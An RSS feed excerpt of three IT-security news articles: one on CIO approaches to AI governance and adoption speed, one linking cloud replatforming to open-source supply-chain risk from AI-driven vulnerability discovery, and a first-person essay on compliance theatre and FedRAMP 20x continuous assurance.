<title><![CDATA[Rethinking the balance between AI oversight and innovation]]></title>
<description><![CDATA[The new CIO mandate is clear: facilitate AI adoption across the enterprise at speed.



According to CIO.com’s State of the CIO survey, CEOs’ top priority for their IT executives is to capitalize on AI. From researching to evaluating AI products, CIOs are now the central figures in their organiza...]]></description>
<link>https://tsecurity.de/de/3624047/it-security-nachrichten/rethinking-the-balance-between-ai-oversight-and-innovation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624047/it-security-nachrichten/rethinking-the-balance-between-ai-oversight-and-innovation/</guid>
<pubDate>Thu, 25 Jun 2026 12:08:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The new CIO mandate is clear: facilitate AI adoption across the enterprise at speed.</p>



<p>According to CIO.com’s <a href="https://us.resources.cio.com/resources/state-of-the-cio/">State of the CIO survey, CEOs’ to</a>p priority for their IT executives is to <a href="https://www.cio.com/article/4171959/ceos-top-priorities-for-it-leaders-today-2.html">capitalize on AI</a>. From researching to evaluating AI products, CIOs are now the central figures in their organizations’ AI strategies.</p>



<p>And company leaders are looking for real outcomes. Almost two-thirds of senior leaders report there is more pressure to prove ROI on their AI investments than a year ago, according to <a href="https://www.kyndryl.com/us/en/insights/readiness-report-2025">Kyndryl’s 2025 Readiness Report</a>.</p>



<p>Numerous sources — from the board, to the CEO, to business units and competitors — are behind this pressure, says <a href="https://www.linkedin.com/in/tushman/">Jonathan Tushman</a>, chief AI officer and CTO at Hi Marley, a customer conversational platform for the property and casualty insurance industry.</p>



<p>Succeeding in the task ahead of them requires complex conversations, and getting through legal, compliance, and other checks “at a reasonable clip,” adds Tushman, who added CAIO to his remit more than 18 months ago but has felt added urgency in the past six months. In professional gatherings, board conversations, and almost everywhere across the business world, the conversation turns to AI — and then quickly the fear of failing behind.</p>



<p>That includes employees as well. “It’s the engineering team and there’s everybody else — marketing, sales, finance. It’s people who are not AI-native, but they’re very eager to use these tools at an early level,” he says.</p>



<p>As CIOs find themselves facing pressure to scale and demonstrate real value, the challenge is keeping up with risk considerations — without creating unnecessary friction.</p>



<p>“CIOs cannot be risk averse on this,” says <a href="https://www.linkedin.com/in/chakraj/">Karthik Chakkarapani</a>, SVP, CIO, and head of enterprise AI at Zuora. “We need to do security and governance, but we don’t want to be seen as slowing down the process. You have to build the highway with enough guardrails and fewer speed breakers.”</p>



<p>Moreover, he adds, “this is not about automating existing work. This is reimagining how work gets done.”</p>



<h2 class="wp-block-heading">AI is a step-change in risk management</h2>



<p>Most IT leaders are a long way from feeling comfortable with the new AI risk management balancing act. Just 31% of respondents feel completely ready across external business risks, Kyndryl’s survey reports.</p>



<p>Tushman believes two things are genuinely different about the risks AI introduces. The first is that AI is indeterminate, whereas most technology is deterministic. “You can’t prove an AI system will or won’t do X, so the traditional ‘put controls around it and verify’ model breaks down,” he says. “We need a different way to govern something whose behavior you fundamentally can’t pin down.”</p>



<p>The second is the gravitational pull on end-users. “With most tech, IT could take its time evaluating before rollout,” he says. “With AI, if you don’t put powerful tools in front of people fast, they’ll route around you — and shadow use creates more risk than controlled access ever would. The timeline compresses at the same time the control model gets harder.”</p>



<p><a href="https://www.linkedin.com/in/tonyvizza/">Tony Vizza,</a> founder and managing partner of Novera, agrees that the instinct to move fast can lead to the exact failures everyone fears.</p>



<p>“This might be staff putting sensitive information into public tools without a proper governance structure, or people copying and pasting straight out of AI and sending incorrect deliverables to customers,” says Vizza.</p>



<p>Organizations should avoid jumping into AI <a href="https://www.cio.com/article/4164155/your-ceo-just-got-ai-fomo-here-are-6-tips-on-what-to-do-next.html">because of the fear of missing out</a> without first clarifying where and how it will be used. All risk decisions should flow from these questions, he says. “What problems are you trying to solve — is it better customer service or deeper insight into your data? What are you actually trying to do?”</p>



<p>Vizza recommends guiding AI decisions with a risk assessment that considers expected outcomes, size of investment, and its importance to the organization’s objectives. “You define your risk appetite, build a risk register, and define what risk treatment should be for each risk,” he says. “For example, if you’re going to use a public AI model, you might treat that risk by not putting sensitive data in or buying the right license so that if you do, you’re covered, or getting guidance from the regulator before you proceed.”</p>



<p>Organizations must also consider AI services as a third-party risk, and not leave all accountability with AI providers, Vizza says. “You can’t outsource the responsibility,” he adds.</p>



<p>Due diligence is required to understand what is in the AI provider’s contract, who is responsible if they have a data breach, and how your organization can pursue them if something goes wrong.</p>



<p>“Some organizations build that into their risk management process. Others are quite flippant or don’t even know they should be asking those questions — and that’s what gets them stuck down the track,” he says.</p>



<h2 class="wp-block-heading">The importance of organizational design</h2>



<p>At Hi Marley, Tushman and team have made structural decisions to foster “healthy internal tensions” that are intended to surface and address AI risk considerations. This includes separation between the “AI adopters” in the product and technical teams and the “AI oversight” teams in compliance and legal. Compliance owns the audits, security concerns, and ongoing oversight, while legal owns the documentation that describes the boundaries. “The key is that it’s independent from the teams pushing AI forward,” he says.</p>



<p>“Companies need to invest seriously in these compliance functions. Hire smart, nuanced people. These roles can’t just be ‘no’ machines, but they can’t rubber-stamp everything either. The value is in the judgment,” he says.</p>



<p>Tushman’s role is the AI innovation steward, spearheading AI adoption that includes being challenged on risk, compliance, and legal considerations. “We have a senior leadership team and we have ‘conflict by design’ within that group,” he says. “I play the CAIO role and next to me, I have our head of legal and our head of compliance. So in that leadership team, if we have ‘conflict,’ we’re able to understand the trade-offs and make a decision as a group.”</p>



<p>Tushman believes this creates healthy tension: Innovation-minded leaders push boundaries while compliance and risk leaders counterbalance them. But if a decision can’t be reached, it goes to the CEO. “I do recommend a [split decision] goes to another officer in the organization,” he says.</p>



<p>Decisions about organizational structure could prove to be as consequential as the AI adoption decisions themselves, Tushman says. “The companies that get the organizational design right early will have a real advantage,” he explains.</p>



<h2 class="wp-block-heading">Desire for AI advances the risk equation</h2>



<p>One of the features of the AI wave is the thirst for access — from the board to employees — to use the tools, build applications, and start putting them to work. “Right now, everyone’s dying to try it,” says Tushman.</p>



<p>Hi Marley is in the “activation” phase — meeting the appetite for the tools with safety wrappers. “My main goal here is to have people learn the tools, start using them, and gain some competency with them,” he says. “We will get to the measurement phase, but I think spending too much time on measuring right now is not worth the effort.”</p>



<p>Tushman, like many, is watching how quickly models improve. “AI has huge implications for how you organize, how you hire, and what buy‑versus‑build decisions you make,” he says.</p>



<p>Zuora, which specializes in software for subscription and recurring revenue businesses, is three years into its AI journey. Chakkarapani is adamant that speed for speed’s sake is not the goal.</p>



<p>“We don’t want to take an existing process and just make it faster. You’re just making a process more chaotic. Can we make it fast, smarter, and reorganize it?”</p>



<p>Vizza believes a good percentage of CIOs will need external help to navigate the push for rapid AI adoption. “Or they’ll need to upskill themselves, because AI operates very differently to traditional IT,” he says.</p>



<p>His advice is threefold. First, “make your decisions on the right basis — either learn how AI really works or bring in someone who can advise you properly,” he says. Second, bring it back to the business purpose. “There are opportunities with AI, but the core question is, ‘What are we trying to achieve by bringing this in?’” And third, work out how you’re going to manage the risk. “Risk isn’t necessarily a bad thing — Formula 1 cars are risky, but they have very good braking systems so they can go faster,” he says. “It’s the same with AI: You put the right risk management in place so the business can move quickly without suffering adverse consequences.”</p>



<p>In its almost three-year AI journey, Zuora started with experimentation before moving 12 enterprise-wide pilots into production, Chakkarapani says, adding that there are three pillars to assess potential AI projects against: effort, value, and confidence. “Effort includes the security risk,” he says. “Is it low, medium, or high?”</p>



<p>Chakkarapani’s team started with simple executions, although the first experiments didn’t go as hoped — providing valuable lessons for the following ones. “We learned AI is only good when you have the right data — the right content, context, and governance,” he says.</p>



<p>They moved on to IT service management and that’s when the practical learnings really started, gaining feedback from internal teams and users, answering the security and governance questions, and iterating as they went.</p>



<p>Early applications include marketing, sales, product, and technology, achieving 10x to 25x throughput improvements. Success is measured in business outcomes such as growth, cost saving, customer engagement.</p>



<p>Through this process, the team has been doing the “behind the scenes” work to speed AI adoption across the company. “We realized that to go at speed and scale, we need to have the right trust, security, and governance underlying it,” he says.</p>



<p>An enterprise-wide platform connects Zuora’s approved AI services, including ChatGPT and domain-specific tools, to its structured and unstructured data. On top of this is the context layer and services so that people can build their own applications. It uses each employee’s existing login and organizational profile, and it respects the same role-based security.</p>



<p>“We slowly developed the framework that became our blueprint with the 10 to 12 things that need to be considered when creating an AI-driven application. When someone is interested, they’re taken to the self-directed process with these do’s and don’ts that is automatically downloaded as a markdown file to that person’s computer,” he says.</p>



<p>The ultimate aim is delivering up to 100x business value through an enterprise-wide governed platform — covering IT, HR, finance, legal, procurement, sales, and product. IT plays the role of orchestrator, providing the platform to access the tools and agents and collaborating with the business team to reorganize that workflow.</p>



<h2 class="wp-block-heading">The AI maturity model</h2>



<p>Chakkarapani believes the more secure the environment, the more it paves the way for experimentation, adoption, and, in time, business results. At Zuora, Chakkarapani has evolved this process through three levels of organizational AI maturity to date:</p>



<p><strong>Level 1:</strong> IT provides a platform and services. Employees have controlled access to data based on their role and security privileges. They can create their own agent for themselves. If something doesn’t pass the minimal security and compliance and requirements, it cannot move ahead.</p>



<p><strong>Level 2:</strong> An employee-built agent goes through an IT governance check for duplication or overlap, model improvements, security scans, and manual reviews. If approved, it’s shared with the wider enterprise. “We’re doing well on that, but it’s still a lot of manual work because there are no tools in the market that can automate this,” he says.</p>



<p><strong>Level 3:</strong> At this stage of maturity, an organization has established a secure foundation across its applications so AI can scale safely. At Zuora, over six to eight months the team tightened endpoint and application security, enforced mobile device management, introduced AI usage monitoring (including what staff upload into prompts), and disabled Google authentication to block personal or bulk email accounts from accessing unapproved apps.</p>



<p>Earlier this year, the team embarked on working toward Level 4 maturity, where anyone can create a functioning application with minimal human involvement. Realistically, they expect to be 80% to 85% zero-touch because the final mile will still require human involvement.</p>



<p>“My goal is to provide a zero-touch service for anybody in the organization to create applications. If we do, they can go from a concept to an idea, prototype, design, and production — and they do it in less than two weeks,” he says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why your cloud strategy is already out of date]]></title>
<description><![CDATA[I’ve been watching two conversations happen in parallel for the last ~3x months, and almost nobody is connecting them. That gap is going to hurt.



The first conversation is about cloud. Enterprises everywhere are rethinking their hyperscaler dependence. Costs are spiraling out of control. AI wo...]]></description>
<link>https://tsecurity.de/de/3623891/it-security-nachrichten/why-your-cloud-strategy-is-already-out-of-date/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623891/it-security-nachrichten/why-your-cloud-strategy-is-already-out-of-date/</guid>
<pubDate>Thu, 25 Jun 2026 11:08:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I’ve been watching two conversations happen in parallel for the last ~3x months, and almost nobody is connecting them. That gap is going to hurt.</p>



<p>The first conversation is about cloud. Enterprises everywhere are rethinking their hyperscaler dependence. Costs are spiraling out of control. AI workloads are data-sensitive, latency-hungry and expensive to run on someone else’s infrastructure. Suddenly, private clouds are back in fashion. Sovereign clouds are popping up across Europe and Asia. Neoclouds, those nimble, specialized providers, are chipping away at the dominance of AWS, Azure and GCP. The logic is sound. You want control over your costs, your data, your destiny.</p>



<p>After a decade of “just put it in the cloud,” the pendulum is swinging back. Smart move.</p>



<p>The second conversation is happening in a much smaller room. It’s about what AI is about to do to the software supply chain. <a href="https://red.anthropic.com/2026/mythos-preview/" rel="nofollow">Mythos</a> is real. I’ve seen enough to stop treating it like a thought experiment. These models are finding hundreds of vulnerabilities a night, not simple code mistakes, but novel chains of existing issues woven together into attack paths no human researcher would have mapped. It’s creative in a way that genuinely surprised me. That’s not a faster SAST scanner or a better linter. That’s a different class of threat entirely. And here’s the thing: even if you believe Mythos specifically is overhyped or a marketing play, the underlying capability is coming. It’s a when, not an if. The genie isn’t going back in the bottle.</p>



<p>Now, here’s the connection almost nobody is making: you’re replatforming for control, but the software supply chain underneath your workloads was never built for what’s about to hit it. These two trends are on a collision course, and most cloud strategy documents I see don’t mention it at all.</p>



<p>Here’s the connection nobody’s making: you’re replatforming for control, but the software supply chain underneath your workloads wasn’t built for what’s coming.</p>



<h2 class="wp-block-heading">The problem isn’t your infrastructure</h2>



<p>Your private cloud, your sovereign cloud, your carefully chosen neocloud, they all pull the same dependencies. The same open source packages. The same container images. The same long tail of libraries maintained by one or two people who fit it in on weekends and owe your enterprise absolutely nothing. That’s not a criticism of maintainers. It’s just the reality of how open-source works, and it has worked remarkably well for decades. But it was designed for a different tempo.</p>



<p>When AI starts finding vulnerabilities at an industrial scale in those deep dependency chains, your infrastructure choice doesn’t save you. The patch pipeline breaks regardless of where the servers live. It doesn’t matter if you’re running on bare metal in a Frankfurt data center or in a regulated government cloud in Singapore. The vulnerability is inside the container. It’s baked into the base image. It’s three layers down in a logging library that got pulled in transitively six months ago, and nobody on your team even knows it’s there.</p>



<p>We designed coordinated vulnerability disclosure for a world where finding a critical bug was rare, expensive and slow. A skilled researcher might spend weeks reverse-engineering something to find one really good vulnerability. They’d notify the maintainer. The maintainer would have time to triage, develop a patch, test it and publish it. The downstream ecosystem would pick it up over days or weeks. The whole rhythm assumed that the finding was the bottleneck. It’s not anymore. Now the finding is instantaneous and high-volume. The bottleneck has shifted entirely to the human side, the maintainer’s attention, the review process, the patching cadence, the downstream adoption. That pipeline doesn’t scale. It was never going to.</p>



<p>And we’re already seeing the early signs of strain. Maintainers are drowning in automated vulnerability reports and AI-generated noise. Security scanners fire off tickets for everything, with no triage, no context, no prioritization. The signal-to-noise ratio is terrible. Now imagine layering on hundreds of real, weaponizable CVEs discovered by a model that works overnight. The maintainer burns out. The patch doesn’t come. The downstream is exposed. Multiply that by thousands of projects across the long tail of open source, and you start to see the shape of the problem.</p>



<h2 class="wp-block-heading">What I think actually happen</h2>



<p>Two things need to be true at the same time, and neither of them is comfortable.</p>



<ol start="1" class="wp-block-list">
<li><strong>We need coordinated disclosure that actually works at scale.</strong> Not the fragmented mess we have today. Not a dozen competing groups, each with their own reporting format, their own severity ratings, their own urgency theatrics. One trusted pipeline. One place where vetted, verified, actionable reports land in a maintainer’s inbox with everything they need to act. Maintainers need to know that if they see a report from this pipeline, it’s real, it’s urgent and it comes with a tested fix. That’s the only way to cut through the noise. This isn’t a technical problem as much as it’s a coordination and trust problem. And it’s solvable if we have the will to stop competing and start cooperating.<br><br></li>



<li>And this is the part that makes people uncomfortable: <strong>We need a maintainer of last resort.</strong> I’m not saying this lightly. Some projects won’t patch. Some can’t, the maintainer is gone, the repo is abandoned, the original author is unreachable. Some maintainers will respond but won’t be able to ship a fix in the timeframe that matters. In every one of those cases, the downstream is left holding the risk with no recourse. Open source has always had a mechanism for exactly this situation: the fork. You take the project, you assume stewardship and you keep it alive independently. That’s not a violation of open-source principles. It is the principle. It’s the escape hatch that ensures no single maintainer becomes a permanent single point of failure for the entire ecosystem.</li>
</ol>



<p>If we don’t build both of these things, the coordinated pipeline and the last-resort stewardship, the default outcome is chaos. Every major cloud provider will fork its own versions of critical libraries. Security vendors will ship competing forks of the same logging framework, the same serialization library, the same crypto wrapper. Your team will be left trying to figure out which fork has which CVE fixed, whether the fix itself introduces new issues and whether the fork is even maintained anymore. That’s not a theoretical nightmare. That’s the logical endpoint of doing nothing, and we’re already seeing early signs of it.</p>



<h2 class="wp-block-heading">What if I’m asking the wrong question?</h2>



<p>If I’m advising a customer right now, and I have these conversations every week, I tell them three things.</p>



<p>One, your cloud strategy needs a supply chain strategy baked in from the start. Not bolted on later as a compliance checkbox. If you’re replatforming to a sovereign cloud or a private hyperscaler or a neocloud, you’re bringing your dependencies with you. Understand what’s in your containers. Know your SBOM not as a document you generate for an audit, but as a living inventory you can query when something breaks. If you don’t know what’s in your stack, you can’t fix it.</p>



<p>Two, ask your vendors the hard question: what’s your Plan B when a critical dependency doesn’t get patched? Not if. When. Look for vendors who have thought about this, who have a strategy for maintaining forks, who participate in the ecosystem’s security efforts rather than just consuming and complaining. The ones who shrug or change the subject are telling you something important about how they’ll handle the next Log4j moment, except the next one might not be a single high-profile library. It might be fifty libraries simultaneously, across your entire stack.</p>



<p>Three, start building internal muscle for this now. That means having people who understand your dependency graph deeply enough to make tough calls about when to wait for an upstream patch and when to fork and maintain yourself. It means having the CI/CD infrastructure to ship fixes fast without breaking things. It means training your incident response teams to think about supply chain compromises, not just infrastructure attacks. The skills and processes you need are different from what most organizations have today.</p>



<h2 class="wp-block-heading">The hard fork</h2>



<p>There’s a version of this story where we get it right. Where the ecosystem comes together, builds the disclosure pipeline, funds the maintainer of last resort and creates a model that actually works for the AI era. I genuinely believe that’s possible. Open source has survived existential threats before. It adapts precisely because it’s decentralized, because anyone can fork, because the license guarantees the right to pick up where someone else left off.</p>



<p>But this time the clock is ticking faster. The same models that are going to stress-test our dependencies are the ones that can help us defend them. The question is whether we organize ourselves in time, or whether we wait for a crisis that forces everyone into their corners, forking in isolation, burning trust and learning the hard way what coordination could have prevented.</p>



<p>Your cloud strategy document probably has a section on disaster recovery. It probably covers what happens when a region goes down, when a provider has an outage, when a certificate expires. Does it cover what happens when a library four layers deep in your container image is discovered to have a critical vulnerability, and the maintainer hasn’t been seen on GitHub in eight months?</p>



<p>If it doesn’t, now is the time to write that section. Because that scenario isn’t hypothetical anymore. It’s just a matter of when.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[GRC is broken. FedRAMP 20x might fix it]]></title>
<description><![CDATA[We are auditing a curated version of history.



I’ve worked in security long enough now to know something most of us don’t really say out loud. A lot of compliance is theatre. Not all of it, and not all auditors or frameworks, but enough of it that most experienced CISOs know exactly what I mean...]]></description>
<link>https://tsecurity.de/de/3623890/it-security-nachrichten/grc-is-broken-fedramp-20x-might-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623890/it-security-nachrichten/grc-is-broken-fedramp-20x-might-fix-it/</guid>
<pubDate>Thu, 25 Jun 2026 11:08:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>We are auditing a curated version of history.</p>



<p>I’ve worked in security long enough now to know something most of us don’t really say out loud. A lot of compliance is theatre. Not all of it, and not all auditors or frameworks, but enough of it that most experienced CISOs know exactly what I mean. If you understand how audits work, know how controls are interpreted and can manage scope and narrative well enough, you can often steer things where you need them to go.</p>



<p>That’s uncomfortable to admit, but it’s true. The market now treats things like SOC 2 and ISO 27001 as direct statements about operational maturity and security posture when they really aren’t. They are snapshots. Point-in-time reviews based on selected evidence and sampled testing. That doesn’t make them useless. These frameworks were built for a completely different world where cloud infrastructure was less dynamic, APIs weren’t everywhere and continuous telemetry at scale simply wasn’t realistic. Sampling existed because there wasn’t much of an alternative. That’s before we even mention AI, where technology now changes on a monthly cadence against a regulatory backdrop that speaks in years.</p>



<p>The issue is that the world moved on, but assurance largely didn’t. The team behind  <a href="https://www.fedramp.gov/20x">FedRAMP 20x</a> are attempting to address exactly that problem, pushing assurance towards automation, machine-readable evidence and continuous validation rather than documentation-heavy compliance exercises. Most compliance programs still revolve around screenshots, exported evidence, manually curated narratives and carefully staged representations of reality. And that word, reality, is the important bit because in many cases, we are not auditing reality at all. We are auditing a curated version of history.</p>



<p>That’s why one of the most important things I’ve heard said around FedRAMP 20x is this: <strong>Passing audits does not equal security</strong>.</p>



<p>Exactly. A company can pass an audit while engineers bypass processes every Friday night to hit deadlines. Controls can drift quietly over time while nobody notices because the evidence only exists for a specific audit window. The audit passes because the story passes, and honestly, I think that’s the bit the industry is becoming increasingly uncomfortable with. How many times a year is the production push made as a “hot fix”?</p>



<p>And honestly, I think that’s why movements like GRC engineering are getting so much traction. Not because people suddenly wanted a trendy new title for compliance. But because there’s growing frustration with how artificial parts of the industry have become.</p>



<p>A few months ago, I gave a talk in Seattle comparing the rise of GRC engineering to the rise of grunge music. I’m a huge Nirvana fan, so maybe the analogy was inevitable, but the more I thought about it, the more it made sense. Grunge didn’t emerge because people desperately wanted something shiny and new. It emerged because people stopped believing the polished version was real. Hair metal had become overproduced and performative. Grunge felt rough around the edges, but it also felt honest.</p>



<p>That’s exactly where GRC feels like it is right now. Too much compliance has become about presenting the cleanest possible version of reality instead of exposing operational truth. Too many clean reports. Too many green ticks on trust centers. Too many perfect policies.</p>



<h2 class="wp-block-heading">The sat nav problem</h2>



<p>Which brings me to one of the dumbest weekends of my life.</p>



<p>Many years ago, my wife decided she wanted to go glamping in the Lake District for Valentine’s Day.</p>



<p>We drove north through classic, miserable British weather in a tiny little car completely unsuited for what was coming.</p>



<p>As we got closer to the Lakes, the rain slowly turned into heavy snow.</p>



<p>Then a full blizzard.</p>



<p>The sat nav confidently directed us up a tiny snow-covered road that we physically could not drive up.</p>



<p>We got stuck.</p>



<p>Eventually, we got free.</p>



<p>The sat nav recalculated and sent us up another equally impossible road.</p>



<p>Same outcome.</p>



<p>This happened multiple times until we eventually ended up buried in a snow drift somewhere in the middle of nowhere, waiting for a bloke in a 4×4 to rescue us while trying not to laugh too hard at the idiots in the tiny car.</p>



<p>After about seventeen hours of driving, we gave up and drove home.</p>



<p>Completely failed Valentine’s trip.</p>



<p>But honestly, I think about that weekend a lot when I think about GRC because the sat nav had data. What it lacked was context. It didn’t understand the environment, the conditions, the capability of the vehicle or even the actual outcome we were trying to achieve. We became obsessed with following the prescribed route instead of stepping back and asking whether the route itself still made sense. It reminds me of stories like tourists literally driving into the sea while blindly following GPS directions. The problem wasn’t the absence of data. The problem was understanding the context around the data.  Tourists drive into sea following GPS directions.</p>



<p>A lot of compliance programs behave the same way. The objective quietly becomes “pass the audit” instead of “reduce meaningful risk”, and once that happens, teams start optimising for the framework rather than the security outcome. That’s the shift I think FedRAMP 20x and the broader GRC engineering movement are trying to force. Not just better automation or more integrations, but a fundamentally different way of thinking about trust.</p>



<h2 class="wp-block-heading">Compliance becomes an engineering problem</h2>



<p>One of the central ideas behind FedRAMP 20x is that assurance increasingly needs to be treated as an engineering challenge rather than a documentation exercise.</p>



<p>Historically, most compliance has been based on samples. Sampled pull requests, sampled access reviews and sampled infrastructure evidence. FedRAMP 20x pushes in a very different direction with machine-readable evidence, APIs, telemetry and complete datasets instead of manually curated snapshots. Many of these principles closely mirror those outlined in the <a href="https://grc.engineering/">GRC Engineering Manifesto</a>, which argues that modern assurance should be built on automation, telemetry and engineering disciplines rather than static evidence collection.</p>



<p>One of the biggest mindset shifts for our engineering teams was realising FedRAMP wasn’t really asking for selected evidence anymore. They wanted the underlying operational data itself. Not a screenshot proving something was configured correctly on one specific day, but the actual flow of telemetry that underpinned the control or assurance statement. That’s a completely different way of thinking about compliance because the conversation moves away from “prove this existed once” and towards “show me the operational reality continuously.”</p>



<p>Instead of showing a screenshot proving a virtual machine was configured correctly on one day, you expose every VM in the environment alongside drift data over time.</p>



<p>Instead of selecting a handful of GitHub pull requests, you expose the entire development workflow, including the messy bits where processes were bypassed.</p>



<p>Instead of showing sampled JML evidence, you expose the full lifecycle history of identity management over years.</p>



<p>Honestly, it should feel uncomfortable because that discomfort is probably a sign you’re finally exposing operational truth instead of polishing it away. Trust shouldn’t come from perfection. It should come from transparency.</p>



<h2 class="wp-block-heading">We thought we were ready</h2>



<p>And honestly, that’s exactly why our own FedRAMP 20x journey became so interesting.</p>



<p>We originally planned to move towards moderate through a much longer runway. Then the programme timings changed, government shutdowns caused disruption, and suddenly we found ourselves with around six or seven weeks before audit activity started.</p>



<p>We thought we had a solid plan.</p>



<p>We didn’t.</p>



<p>Or at least not one that was mature enough yet.</p>



<p>We had missed the low pilot earlier in the journey and entered the moderate phase without having already gone through that foundational learning process. We were also the only organization in our pilot group that hadn’t already completed the low pathway first.</p>



<p>That mattered.</p>



<p>We didn’t yet have the operational muscle memory.</p>



<p>No established playbook.<br>No previous iteration.<br>No deeply embedded understanding of how this model actually behaved in practice.</p>



<p>At the same time, we weren’t trying to approach FedRAMP 20x like traditional compliance.</p>



<p>We built direct API connectivity that allowed FedRAMP and auditors to pull complete machine-readable datasets in JSON format directly from the platform. Human-readable exports still existed where required, but the focus was on exposing operational truth rather than curating static evidence.</p>



<p>That’s also one of the core principles behind FedRAMP 20x itself. Controls increasingly need to be both machine-readable and human-readable. The baseline expectation is that a large percentage of controls should be automated with continuous evidence flowing behind them instead of static evidence being manually assembled before an audit.</p>



<p>What that means in practice is that auditors no longer just review a point-in-time evidence pack. They gain ongoing visibility into operational datasets and can interrogate those environments in a much more dynamic way.</p>



<p>That’s a very different mindset from traditional compliance.</p>



<p>And honestly, I think that difference is part of what made the journey so valuable.</p>



<h2 class="wp-block-heading">We didn’t fail. We iterated</h2>



<p>Because I don’t actually think what happened next was failure.</p>



<p>I think it was iteration.</p>



<p>Modern engineering teams don’t release perfect software on day one. They test, rebuild, refactor, improve and iterate continuously based on telemetry and feedback.</p>



<p>Applications go through:</p>



<ul class="wp-block-list">
<li>Testing</li>



<li>User feedback</li>



<li>Redesign</li>



<li>Bug fixing</li>



<li>Telemetry analysis</li>



<li>Continuous improvement</li>
</ul>



<p>Nobody expects version one to be perfect.</p>



<p>Yet historically, GRC has behaved completely differently.</p>



<p>Build the controls.<br>Collect the evidence.<br>Pass the audit.<br>Repeat next year.</p>



<p>The audit becomes the finish line. Our finish line became a “good effort,” “we think you’re ready for a Low authorization, but not Moderate just yet.” For a moment, it felt like failure. It hurt. It felt fundamentally different from any other assessment or audit as we genuinely didn’t know what we’d achieved. In fact, FedRAMP 20x feels fundamentally different and maybe that’s the whole point.</p>



<p>The process itself became feedback.</p>



<p>Not: Can you tell a convincing enough story?</p>



<p>But: What does your environment actually look like and how do you continuously improve it?</p>



<p>That’s a completely different mindset.</p>



<p>One of the recurring themes throughout FedRAMP 20x is that assurance should improve through continuous iteration rather than annual point-in-time validation.</p>



<p>Exactly.</p>



<p>That’s how engineering works.</p>



<p>The Low authorization wasn’t the end state. It was a checkpoint and a recalibration moment that helped us understand where the next iteration needed to go.</p>



<p>And honestly, if you can speedrun moderate FedRAMP with perfectly polished dashboards and no uncomfortable truths exposed, then the framework probably isn’t doing its job.</p>



<p>That’s one of the things I genuinely appreciate about FedRAMP 20x.</p>



<p>It challenges your assumptions.</p>



<p>It forces you to rethink approaches that have become normalized across large parts of the compliance industry.</p>



<p>Historically, proving infrastructure security often meant screenshots or exported configs. Now we can expose every VM, every drift event and the full history of posture changes across the environment.</p>



<p>That changes behavior massively because you can no longer optimize around the cleanest possible sample. You have to maintain the actual posture continuously.</p>



<p>Historically, proving SDLC maturity meant selecting a handful of pull requests. Now we can expose the entire workflow, including every bypassed approval or manual push into production.</p>



<p>Historically, proving identity governance meant sampled JML reviews. Now we can expose the operational history of the full identity lifecycle over years.</p>



<p>And honestly, that was one of the areas that challenged some of our own assumptions the most.</p>



<p>Traditional sampled evidence can make processes look consistently successful because you’re only reviewing selected examples. But operational truth is different. You only need one joiner, mover or leaver process to fail in the wrong way for the risk to become real.</p>



<p>That’s exactly the kind of thing continuous operational visibility exposes much more quickly than traditional evidence collection.</p>



<p>That’s not just better evidence.</p>



<p>It’s a fundamentally different philosophy of assurance.</p>



<h2 class="wp-block-heading">The rise of GRC engineering</h2>



<p>And this is where I think GRC engineering becomes genuinely important.</p>



<p>Not because everybody suddenly needs to become a software engineer, but because the discipline itself is evolving from a documentation exercise into an operational engineering problem.</p>



<p>Modern GRC teams are increasingly building telemetry pipelines, integrations, APIs, infrastructure visibility and continuous assurance layers. And honestly, some of those pipelines are much harder to build than people realize. Cloud infrastructure, CSPM tooling and application security platforms are relatively straightforward because the data is already fairly structured and accessible. The really difficult parts are the messy operational systems that organizations historically handled through process and human coordination.</p>



<p>Things like policy management workflows, budget approvals, software bill of materials tracking and non-standard operational processes are far harder to standardize and expose consistently.</p>



<p>That’s another reason this shift matters so much. It forces organizations to operationalize areas that historically lived in spreadsheets, meetings or tribal knowledge.</p>



<p>That’s a very different skillset from managing spreadsheets and coordinating screenshots.</p>



<p>More importantly, it changes the conversations.</p>



<p>One of the things I enjoyed most throughout the FedRAMP 20x process was that discussions increasingly stopped being: How do we satisfy this control?</p>



<p>And became: What risk are we actually trying to reduce here?</p>



<p>That’s such a healthier conversation for security teams to have. Because not every risk matters equally to every organization. Not every control meaningfully improves security posture. Not every framework requirement deserves the same operational investment.</p>



<p>Traditional compliance often struggles with that nuance because it optimizes around consistency and uniformity.</p>



<p>Modern engineering-led assurance feels different.</p>



<p>It feels more contextual, more operational and honestly far more honest.</p>



<p>And honestly, honesty is probably the biggest thing missing from large parts of compliance today.</p>



<p>We’ve built an industry where everyone feels pressure to look perfect.</p>



<p>Perfect dashboards. Perfect controls. Perfect audit outcomes.</p>



<p>But real engineering environments are never perfect.</p>



<p>They have bugs, drift, exceptions, failures, temporary workarounds and weird edge cases.</p>



<p>That doesn’t automatically mean the environment is insecure. It means it’s real.</p>



<p>I actually think one of the biggest mindset shifts FedRAMP 20x and the broader GRC engineering movement are pushing is this: nonconformities should not automatically destroy trust. Handled correctly, they should build it.</p>



